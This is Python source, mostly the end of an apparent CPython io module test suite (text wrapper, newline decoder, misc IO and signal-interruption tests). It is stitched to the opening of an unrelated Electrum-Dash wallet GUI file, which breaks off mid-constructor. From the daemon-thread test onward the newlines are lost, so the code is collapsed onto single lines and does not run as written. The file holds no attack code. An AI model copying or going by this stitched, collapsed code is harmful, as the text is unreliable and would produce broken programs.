    # Run the shared TextIOWrapperTest suite against the C implementation.
    io = io
    shutdown_error = "LookupError: unknown encoding: ascii"

    def test_initialization(self):
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)

        # repr() on a never-initialized wrapper must not crash.
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with support.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(support.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t  # create a reference cycle so only the GC can free it
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
        # Create many cyclic pairs so the GC is the one tearing them down.
        for i in range(1000):
            b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t1 = self.TextIOWrapper(b1, encoding="ascii")
            b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t2 = self.TextIOWrapper(b2, encoding="ascii")
            # circular references
            t1.buddy = t2
            t2.buddy = t1
        support.gc_collect()

    def test_del__CHUNK_SIZE_SystemError(self):
        t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
        with self.assertRaises(AttributeError):
            del t._CHUNK_SIZE


class PyTextIOWrapperTest(TextIOWrapperTest):
    # Run the shared TextIOWrapperTest suite against the pure-Python
    # implementation.
    io = pyio
    shutdown_error = "LookupError: unknown encoding: ascii"


class IncrementalNewlineDecoderTest(unittest.TestCase):

    def check_newline_decoding_utf8(self, decoder):
        # UTF-8 specific tests for a newline decoder
        def _check_decode(b, s, **kwargs):
            # We exercise getstate() / setstate() as well as decode()
            state = decoder.getstate()
            self.assertEqual(decoder.decode(b, **kwargs), s)
            decoder.setstate(state)
            self.assertEqual(decoder.decode(b, **kwargs), s)

        _check_decode(b'\xe8\xa2\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        # A dangling lead byte at final=True must raise.
        _check_decode(b'\xe8', "")
        self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)

        decoder.reset()
        _check_decode(b'\n', "\n")
        _check_decode(b'\r', "")
        _check_decode(b'', "\n", final=True)
        _check_decode(b'\r', "\n", final=True)

        _check_decode(b'\r', "")
        _check_decode(b'a', "\na")

        _check_decode(b'\r\r\n', "\n\n")
        _check_decode(b'\r', "")
        _check_decode(b'\r', "\n")
        _check_decode(b'\na', "\na")

        _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
        _check_decode(b'\xe8\xa2\x88', "\u8888")
        _check_decode(b'\n', "\n")
        _check_decode(b'\xe8\xa2\x88\r', "\u8888")
        _check_decode(b'\n', "\n")

    def check_newline_decoding(self, decoder, encoding):
        result = []
        if encoding is not None:
            encoder = codecs.getincrementalencoder(encoding)()
            def _decode_bytewise(s):
                # Decode one byte at a time
                for b in encoder.encode(s):
                    result.append(decoder.decode(bytes([b])))
        else:
            encoder = None
            def _decode_bytewise(s):
                # Decode one char at a time
                for c in s:
                    result.append(decoder.decode(c))
        self.assertEqual(decoder.newlines, None)
        _decode_bytewise("abc\n\r")
        self.assertEqual(decoder.newlines, '\n')
        _decode_bytewise("\nabc")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc")
        self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
        decoder.reset()
        input = "abc"
        if encoder is not None:
            encoder.reset()
            input = encoder.encode(input)
        self.assertEqual(decoder.decode(input), "abc")
        self.assertEqual(decoder.newlines, None)

    def test_newline_decoder(self):
        encodings = (
            # None meaning the IncrementalNewlineDecoder takes unicode input
            # rather than bytes input
            None, 'utf-8', 'latin-1',
            'utf-16', 'utf-16-le', 'utf-16-be',
            'utf-32', 'utf-32-le', 'utf-32-be',
        )
        for enc in encodings:
            decoder = enc and codecs.getincrementaldecoder(enc)()
            decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
            self.check_newline_decoding(decoder, enc)
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
        self.check_newline_decoding_utf8(decoder)
        self.assertRaises(TypeError, decoder.setstate, 42)

    def test_newline_bytes(self):
        # Issue 5433: Excessive optimization in IncrementalNewlineDecoder
        def _check(dec):
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0D00"), "\u0D00")
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0A00"), "\u0A00")
            self.assertEqual(dec.newlines, None)
        dec = self.IncrementalNewlineDecoder(None, translate=False)
        _check(dec)
        dec = self.IncrementalNewlineDecoder(None, translate=True)
        _check(dec)

    def test_translate(self):
        # issue 35062
        for translate in (-2, -1, 1, 2):
            # translate should behave like a boolean: any non-zero value
            # enables newline translation.
            decoder = codecs.getincrementaldecoder("utf-8")()
            decoder = self.IncrementalNewlineDecoder(decoder, translate)
            self.check_newline_decoding_utf8(decoder)

        # translate=0 disables translation: '\r' and '\r\n' pass through.
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
        self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")

class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    pass

class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    pass


# XXX Tests for open()

class MiscIOTest(unittest.TestCase):

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test___all__(self):
        # Every name exported by the io module must exist and be of the
        # expected category (exception, SEEK_* constant, or IOBase subclass).
        for name in self.io.__all__:
            obj = getattr(self.io, name, None)
            self.assertIsNotNone(obj, name)
            if name in ("open", "open_code"):
                continue
            elif "error" in name.lower() or name == "UnsupportedOperation":
                self.assertTrue(issubclass(obj, Exception), name)
            elif not name.startswith("SEEK_"):
                self.assertTrue(issubclass(obj, self.IOBase))

    def test_attributes(self):
        f = self.open(support.TESTFN, "wb", buffering=0)
        self.assertEqual(f.mode, "wb")
        f.close()

        with support.check_warnings(('', DeprecationWarning)):
            f = self.open(support.TESTFN, "U")
            self.assertEqual(f.name, support.TESTFN)
            self.assertEqual(f.buffer.name, support.TESTFN)
            self.assertEqual(f.buffer.raw.name, support.TESTFN)
            self.assertEqual(f.mode, "U")
            self.assertEqual(f.buffer.mode, "rb")
            self.assertEqual(f.buffer.raw.mode, "rb")
            f.close()

        f = self.open(support.TESTFN, "w+")
        self.assertEqual(f.mode, "w+")
        self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
        self.assertEqual(f.buffer.raw.mode, "rb+")

        g = self.open(f.fileno(), "wb", closefd=False)
        self.assertEqual(g.mode, "wb")
        self.assertEqual(g.raw.mode, "wb")
        self.assertEqual(g.name, f.fileno())
        self.assertEqual(g.raw.name, f.fileno())
        f.close()
        g.close()

    def test_open_pipe_with_append(self):
        # bpo-27805: Ignore ESPIPE from lseek() in open().
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        f = self.open(w, 'a')
        self.addCleanup(f.close)
        # Check that the file is marked non-seekable. On Windows, however,
        # lseek somehow succeeds on pipes.
        if sys.platform != 'win32':
            self.assertFalse(f.seekable())

    def test_io_after_close(self):
        # Every operation on a closed file must raise ValueError, across
        # all open modes / buffering layers.
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "w", "buffering": 1},
                {"mode": "w", "buffering": 2},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "r", "buffering": 1},
                {"mode": "r", "buffering": 2},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+", "buffering": 1},
                {"mode": "w+", "buffering": 2},
                {"mode": "w+b", "buffering": 0},
            ]:
            f = self.open(support.TESTFN, **kwargs)
            f.close()
            self.assertRaises(ValueError, f.flush)
            self.assertRaises(ValueError, f.fileno)
            self.assertRaises(ValueError, f.isatty)
            self.assertRaises(ValueError, f.__iter__)
            if hasattr(f, "peek"):
                self.assertRaises(ValueError, f.peek, 1)
            self.assertRaises(ValueError, f.read)
            if hasattr(f, "read1"):
                self.assertRaises(ValueError, f.read1, 1024)
                self.assertRaises(ValueError, f.read1)
            if hasattr(f, "readall"):
                self.assertRaises(ValueError, f.readall)
            if hasattr(f, "readinto"):
                self.assertRaises(ValueError, f.readinto, bytearray(1024))
            if hasattr(f, "readinto1"):
                self.assertRaises(ValueError, f.readinto1, bytearray(1024))
            self.assertRaises(ValueError, f.readline)
            self.assertRaises(ValueError, f.readlines)
            self.assertRaises(ValueError, f.readlines, 1)
            self.assertRaises(ValueError, f.seek, 0)
            self.assertRaises(ValueError, f.tell)
            self.assertRaises(ValueError, f.truncate)
            self.assertRaises(ValueError, f.write,
                              b"" if "b" in kwargs['mode'] else "")
            self.assertRaises(ValueError, f.writelines, [])
            self.assertRaises(ValueError, next, f)

    def test_blockingioerror(self):
        # Various BlockingIOError issues
        class C(str):
            pass
        c = C("")
        b = self.BlockingIOError(1, c)
        # Reference cycle between the exception and its argument: the GC
        # must still be able to collect both.
        c.b = b
        b.c = c
        wr = weakref.ref(c)
        del c, b
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_abcs(self):
        # Test the visible base classes are ABCs.
        self.assertIsInstance(self.IOBase, abc.ABCMeta)
        self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
        self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
        self.assertIsInstance(self.TextIOBase, abc.ABCMeta)

    def _check_abc_inheritance(self, abcmodule):
        # Each concrete layer must belong to exactly its own ABC (plus
        # IOBase) from *abcmodule*, and to none of the others.
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "wb") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "w") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertIsInstance(f, abcmodule.TextIOBase)

    def test_abc_inheritance(self):
        # Test implementations inherit from their respective ABCs
        self._check_abc_inheritance(self)

    def test_abc_inheritance_official(self):
        # Test implementations inherit from the official ABCs of the
        # baseline "io" module.
        self._check_abc_inheritance(io)

    def _check_warn_on_dealloc(self, *args, **kwargs):
        # Dropping the last reference to an open file must emit a
        # ResourceWarning mentioning the file's repr.
        f = open(*args, **kwargs)
        r = repr(f)
        with self.assertWarns(ResourceWarning) as cm:
            f = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))

    def test_warn_on_dealloc(self):
        self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
        self._check_warn_on_dealloc(support.TESTFN, "wb")
        self._check_warn_on_dealloc(support.TESTFN, "w")

    def _check_warn_on_dealloc_fd(self, *args, **kwargs):
        fds = []
        def cleanup_fds():
            for fd in fds:
                try:
                    os.close(fd)
                except OSError as e:
                    if e.errno != errno.EBADF:
                        raise
        self.addCleanup(cleanup_fds)
        r, w = os.pipe()
        fds += r, w
        self._check_warn_on_dealloc(r, *args, **kwargs)
        # When using closefd=False, there's no warning
        r, w = os.pipe()
        fds += r, w
        with support.check_no_resource_warning(self):
            open(r, *args, closefd=False, **kwargs)

    def test_warn_on_dealloc_fd(self):
        self._check_warn_on_dealloc_fd("rb", buffering=0)
        self._check_warn_on_dealloc_fd("rb")
        self._check_warn_on_dealloc_fd("r")

    def test_pickling(self):
        # Pickling file objects is forbidden
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+b", "buffering": 0},
            ]:
            for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.open(support.TESTFN, **kwargs) as f:
                    self.assertRaises(TypeError, pickle.dumps, f, protocol)

    def test_nonblock_pipe_write_bigbuf(self):
        self._test_nonblock_pipe_write(16*1024)

    def test_nonblock_pipe_write_smallbuf(self):
        self._test_nonblock_pipe_write(1024)

    @unittest.skipUnless(hasattr(os, 'set_blocking'),
                         'os.set_blocking() required for this test')
    def _test_nonblock_pipe_write(self, bufsize):
        sent = []
        received = []
        r, w = os.pipe()
        os.set_blocking(r, False)
        os.set_blocking(w, False)

        # To exercise all code paths in the C implementation we need
        # to play with buffer sizes. For instance, if we choose a
        # buffer size less than or equal to _PIPE_BUF (4096 on Linux)
        # then we will never get a partial write of the buffer.
        rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
        wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)

        with rf, wf:
            for N in 9999, 73, 7574:
                try:
                    i = 0
                    while True:
                        msg = bytes([i % 26 + 97]) * N
                        sent.append(msg)
                        wf.write(msg)
                        i += 1
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    # Truncate the last message to what actually went through,
                    # then drain the pipe so the writer can make progress.
                    sent[-1] = sent[-1][:e.characters_written]
                    received.append(rf.read())
                    msg = b'BLOCKED'
                    wf.write(msg)
                    sent.append(msg)

            while True:
                try:
                    wf.flush()
                    break
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    self.assertEqual(e.characters_written, 0)
                    received.append(rf.read())
            # Drain remaining data until read() returns None (would-block
            # on the empty non-blocking pipe).
            received += iter(rf.read, None)

        sent, received = b''.join(sent), b''.join(received)
        self.assertEqual(sent, received)
        self.assertTrue(wf.closed)
        self.assertTrue(rf.closed)

    def test_create_fail(self):
        # 'x' mode fails if file is existing
        with self.open(support.TESTFN, 'w'):
            pass
        self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')

    def test_create_writes(self):
        # 'x' mode opens for writing
        with self.open(support.TESTFN, 'xb') as f:
            f.write(b"spam")
        with self.open(support.TESTFN, 'rb') as f:
            self.assertEqual(b"spam", f.read())

    def test_open_allargs(self):
        # there used to be a buffer overflow in the parser for rawmode
        self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')

    def test_check_encoding_errors(self):
        # bpo-37388: open() and TextIOWrapper must check encoding and errors
        # arguments in dev mode
        mod = self.io.__name__
        filename = __file__
        invalid = 'Boom, Shaka Laka, Boom!'
        # Each bad-argument case exits with a distinct code so a failure
        # pinpoints which check was skipped; 10 means all checks passed.
        code = textwrap.dedent(f'''
            import sys
            from {mod} import open, TextIOWrapper

            try:
                open({filename!r}, encoding={invalid!r})
            except LookupError:
                pass
            else:
                sys.exit(21)

            try:
                open({filename!r}, errors={invalid!r})
            except LookupError:
                pass
            else:
                sys.exit(22)

            fp = open({filename!r}, "rb")
            with fp:
                try:
                    TextIOWrapper(fp, encoding={invalid!r})
                except LookupError:
                    pass
                else:
                    sys.exit(23)

                try:
                    TextIOWrapper(fp, errors={invalid!r})
                except LookupError:
                    pass
                else:
                    sys.exit(24)

            sys.exit(10)
        ''')
        proc = assert_python_failure('-X', 'dev', '-c', code)
        self.assertEqual(proc.rc, 10, proc)


class CMiscIOTest(MiscIOTest):
    io = io

    def test_readinto_buffer_overflow(self):
        # Issue #18025
        class BadReader(self.io.BufferedIOBase):
            def read(self, n=-1):
                # Deliberately return far more data than requested.
                return b'x' * 10**6

        bufio = BadReader()
        b = bytearray(2)
        self.assertRaises(ValueError, bufio.readinto, b)

    def check_daemon_threads_shutdown_deadlock(self, stream_name):
        # Issue #23309: deadlocks at shutdown should be avoided when a
        # daemon thread and the main thread both write to a file.
code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked 
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. 
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = support.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. 
N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. 
    # These two inherited tests are disabled for the pure-Python class:
    # guarding against reentrant writes would slow _pyio down even more,
    # so reentrancy is deliberately not handled there.
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None


def load_tests(*args):
    """Build the test suite, injecting the C or pure-Python ``io``
    namespace (plus mock classes) into each test class based on its
    "C"/"Py" name prefix."""
    tests = (CIOTest, PyIOTest, APIMismatchTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )

    # Put the namespaces of the IO module we are testing and some useful mock
    # classes in the __dict__ of each test.
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
             SlowFlushRawIO)
    # "IncrementalNewlineDecoder" is not exported via io.__all__, so it is
    # added to the copied namespace explicitly.
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    c_io_ns = {name : getattr(io, name) for name in all_members}
    py_io_ns = {name : getattr(pyio, name) for name in all_members}
    globs = globals()
    # Map each mock's plain name to its C-/Py-specific subclass defined
    # earlier in this module (e.g. MockRawIO -> CMockRawIO / PyMockRawIO).
    c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
    py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    for test in tests:
        if test.__name__.startswith("C"):
            for name, obj in c_io_ns.items():
                setattr(test, name, obj)
        elif test.__name__.startswith("Py"):
            for name, obj in py_io_ns.items():
                setattr(test, name, obj)

    suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
    return suite

if __name__ == "__main__":
    unittest.main()
# ----- main_window.py (Electrum-Dash Qt GUI; separate source file, concatenation artifact) -----
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
import sys, time, threading import os, json, traceback import shutil import weakref import webbrowser import csv from decimal import Decimal import base64 from functools import partial from PyQt5.QtCore import Qt from PyQt5.QtGui import * from PyQt5.QtWidgets import * from electrum_dash.util import bh2u, bfh from electrum_dash import keystore from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants from electrum_dash.plugins import run_hook from electrum_dash.i18n import _ from electrum_dash.util import (format_time, format_satoshis, PrintError, format_satoshis_plain, NotEnoughFunds, UserCancelled) from electrum_dash import Transaction from electrum_dash import util, bitcoin, commands, coinchooser from electrum_dash import paymentrequest from electrum_dash.wallet import Multisig_Wallet from electrum_dash.masternode_manager import MasternodeManager try: from electrum_dash.plot import plot_history except: plot_history = None from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .masternode_dialog import MasternodeDialog from .fee_slider import FeeSlider from .util import * class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() from electrum_dash.paymentrequest import PR_PAID class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() notify_transactions_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() 
new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet): QMainWindow.__init__(self) self.setObjectName("main_window_container") self.wallet = None self.masternode_manager = None self.gui_object = gui_object self.config = config = gui_object.config self.network = gui_object.daemon.network self.fx = gui_object.daemon.fx self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.is_max = False self.payment_request = None self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tx_notifications = [] self.tl_windows = [] self.tx_external_keypairs = {} self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', 8) self.fee_unit = config.get('fee_unit', 0) self.num_zeros = int(config.get('num_zeros', 8)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() # Disabled until API is stable. 
